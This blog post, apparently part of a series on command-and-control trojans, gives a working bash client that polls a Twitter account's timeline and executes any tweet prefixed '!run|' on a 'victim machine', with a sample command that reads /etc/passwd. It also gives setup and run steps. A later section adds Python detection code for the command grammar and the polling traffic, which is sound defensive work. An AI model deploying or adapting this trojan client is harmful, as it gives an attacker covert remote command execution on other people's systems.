This is the third post in a series covering various command and control (C2) trojan concepts and strategies

In the last few posts I covered a few C2 trojans (a DNS C2 trojan and HTTP GET and POST trojans). In this post I cover a method that uses Twitter for command and control.



Quick Twitter Command and Control Trojan Setup

To do this, we need a Twitter account from which the commands will be posted. For this example, we will call it C_AND_C_USER. We can then post a tweet containing the following message:

!run|cat /etc/passwd > /tmp/test.txt


Now we can use the following script, twitter_client.sh, to fetch the latest tweet from that account and act on it on the victim machine:

#!/bin/bash
# Split curl's output on newlines only, so a whole tweet is one loop item.
IFS_BAK=$IFS
IFS="
"
# Fetch the account's RSS timeline, keep the first <title> that is not the feed
# header, and strip the tags and the "C_AND_C_USER:" prefix from the tweet text.
for i in `curl https://api.twitter.com/1/statuses/user_timeline.rss?screen_name=C_AND_C_USER 2>/dev/null|grep title|grep -v Twitter|head -n 1|sed -e 's/<title>//' -e 's/<\/title>//' -e "s/C_AND_C_USER://" -e "s/^ //g" -e "s/^  //g"`
  do
  if [ `echo $i |grep "^!sleep|"` ] ; then
    # "!sleep|" tweets are ignored
    echo "..."
  elif [ `echo $i |grep "^!run|"` ] ; then
    # "!run|" tweets: drop the prefix and hand the rest to bash
    run=`echo "$i"|sed -e 's/^!run|//'`
    bash "$run"
  else
    # anything else is not a command
    echo "..."
  fi
done
IFS=$IFS_BAK


The only remaining step is to replace C_AND_C_USER with the real Twitter handle. You can do this with sed:

sed -i 's/C_AND_C_USER/fakename/g' twitter_client.sh


Run Client

Finally, we run twitter_client.sh on the victim machine to execute the command:

bash ./twitter_client.sh


The client runs the most recently posted tweet as a command only if it starts with '!run|'. If the latest tweet starts with '!sleep|' or with anything else, the client does not run any command.
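From the defender's side, the two things worth recognising in the design above are the command grammar ('!run|' / '!sleep|' prefixes in otherwise ordinary social-media text) and the traffic shape (a host fetching a single account's timeline feed over and over with a non-browser client). The following Python is an added example, not code from the original post: it implements the grammar check the post describes and a small detection that flags clients polling a user_timeline feed at short, regular intervals. The proxy log lines and their field layout (timestamp, client IP, method, URL, status, user agent) are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample proxy log lines (not from the original post). Assumed format:
# "<ISO timestamp> <client_ip> <method> <url> <status> <user_agent...>"
SAMPLE_PROXY_LOG = """\
2011-05-01T10:00:00 10.0.0.5 GET https://api.twitter.com/1/statuses/user_timeline.rss?screen_name=C_AND_C_USER 200 curl/7.21.0
2011-05-01T10:00:10 10.0.0.5 GET https://api.twitter.com/1/statuses/user_timeline.rss?screen_name=C_AND_C_USER 200 curl/7.21.0
2011-05-01T10:00:20 10.0.0.5 GET https://api.twitter.com/1/statuses/user_timeline.rss?screen_name=C_AND_C_USER 200 curl/7.21.0
2011-05-01T10:01:30 10.0.0.7 GET https://twitter.com/home 200 Mozilla/5.0 (X11; Linux x86_64) Firefox/4.0
2011-05-01T10:02:00 10.0.0.9 GET https://api.twitter.com/1/statuses/user_timeline.rss?screen_name=someblog 200 Mozilla/5.0 (Windows NT 6.1) Firefox/4.0
"""

# The grammar the post describes: a tweet is a command only if it starts with
# "!run|" or "!sleep|"; everything after the bar is the payload.
COMMAND_RE = re.compile(r"^\s*!(run|sleep)\|(.*)$")


def classify_tweet(text):
    """Return ('run', payload), ('sleep', payload) or (None, None)."""
    m = COMMAND_RE.match(text)
    if not m:
        return (None, None)
    return (m.group(1), m.group(2).strip())


TIMELINE_RE = re.compile(r"statuses/user_timeline\.(rss|xml|json)", re.I)
BROWSER_UA_RE = re.compile(r"Mozilla/", re.I)


def parse_line(line):
    """Split one constructed log line into typed fields (UA may contain spaces)."""
    ts, ip, method, url, status, ua = line.split(" ", 5)
    return datetime.fromisoformat(ts), ip, method, url, int(status), ua


def find_timeline_pollers(log_text, min_hits=3, max_interval_s=60):
    """Flag client IPs that fetch a user_timeline feed repeatedly with a
    non-browser user agent, with every gap between fetches at most
    max_interval_s seconds: the traffic shape of a polling C2 client."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, _method, url, _status, ua = parse_line(line)
        if TIMELINE_RE.search(url) and not BROWSER_UA_RE.search(ua):
            hits[ip].append(ts)
    flagged = {}
    for ip, stamps in hits.items():
        stamps.sort()
        if len(stamps) < min_hits:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if max(gaps) <= max_interval_s:
            flagged[ip] = {"requests": len(stamps), "max_gap_s": max(gaps)}
    return flagged


if __name__ == "__main__":
    print(classify_tweet("!run|cat /etc/passwd > /tmp/test.txt"))
    print(find_timeline_pollers(SAMPLE_PROXY_LOG))
```

The user-agent and interval thresholds are the weak point of any such rule: a client that spoofs a browser UA or randomises its sleep will not trip it, so treat this as a starting signal to combine with volume per account and host reputation rather than a standalone alert.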

Regards,

Jabra




